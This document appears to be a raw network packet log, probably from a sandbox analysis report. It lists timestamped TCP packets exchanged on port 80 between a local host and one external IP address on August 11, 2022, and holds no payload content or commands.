Aug 11, 2022 06:57:10.126041889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126079082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126110077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126117945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126148939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126154900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126182079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126193047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126231909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126247883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126422882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126462936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126487017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126499891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126537085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126562119 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126574039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126584053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126611948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.126625061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126666069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.126705885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.127487898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.127528906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.127556086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.127566099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.127593994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.127619028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128537893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128576040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128613949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128643990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128653049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128686905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128690004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128720999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128729105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128735065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128767014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128803968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128822088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128844023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.128866911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.128900051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130173922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130215883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130244970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130254030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130289078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130291939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130330086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130331993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130342007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130367994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130423069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130541086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130573988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130605936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130636930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130636930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130650997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130669117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130697012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.130700111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.130723000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.131700993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.131732941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.131764889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.131768942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.131795883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.131823063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.131827116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.131849051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.131860971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.131884098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132066965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132100105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132128954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132132053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132155895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132160902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132189989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132194042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132217884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132225037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132252932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132270098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132451057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132484913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132541895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132586002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132621050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132652998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132678032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132683992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132694006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132715940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132739067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132746935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132776976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132780075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132810116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132811069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132832050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132842064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132874012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.132889032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.132929087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.133622885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.133814096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.136528969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.136563063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.136595011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.136682987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.136714935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.136753082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.136785984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.136816978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.136847973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.136862040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137518883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137553930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137583971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137593031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137615919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137617111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137649059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137654066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137670040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137681961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137713909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137715101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137746096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137770891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137778044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137809038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137811899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137825966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137839079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137871027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137895107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137901068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137928009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137933016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137950897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.137965918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.137995958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.138022900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.138034105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.138062954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.138073921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.138092995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.138122082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.139065981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.139143944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.139188051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.139563084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.139595985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.139626980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.139672041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.142245054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.142695904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.143162966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143196106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143269062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.143320084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143454075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143490076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143518925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.143521070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143553019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.143553972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143583059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.143585920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143593073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.143620968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.143675089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.150893927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.150950909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.150986910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.151017904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.151025057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.151062012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.151063919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.151097059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.151103973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.152005911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.152049065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.152137041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.153078079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.153117895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.153194904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.153568029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154263020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154428005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154467106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154504061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154531956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154540062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154552937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154588938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154604912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154645920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154659986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154685974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154711008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154721975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.154733896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.154880047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155066967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155215979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155281067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155317068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155318022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155342102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155380964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155400991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155621052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155684948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155755043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155795097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155821085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155832052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155838013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155869961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155914068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155922890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.155936003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155972958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.155978918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.156059027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.159512997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.159538031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.159581900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.159595013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.159595013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.159631014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.159637928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.159679890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.159970045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.159991026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160008907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160027027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160046101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160053015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160064936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160084009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160094023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160103083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160116911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160123110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160142899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160156965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160160065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160168886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160206079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160516024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160537004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160554886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160576105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160594940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160609961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160633087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160643101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160645008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160655975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160664082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160684109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160717964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160743952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.160974026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.160995007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.161012888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.161025047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.161052942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.162864923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.162883043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.162898064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.162908077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.162977934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.162998915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.164006948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.164057970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.164097071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.164125919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.164134979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.164161921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.164171934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.164190054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.164226055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.164307117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165173054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165211916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165241003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.165250063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165277958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.165307045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.165827036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165863991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165900946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165929079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.165937901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165971994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.165973902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.165997982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166012049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166343927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166383982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166407108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166421890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166436911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166459084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166496038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166512966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166534901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166570902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166588068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166712999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166845083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166882992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166918993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166941881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.166955948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.166965008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.167010069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.167337894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.167399883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.167428017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.167515993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.167553902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.167570114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.167592049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168003082 CEST	80	49736	89.208.103.4	192.168.2.3
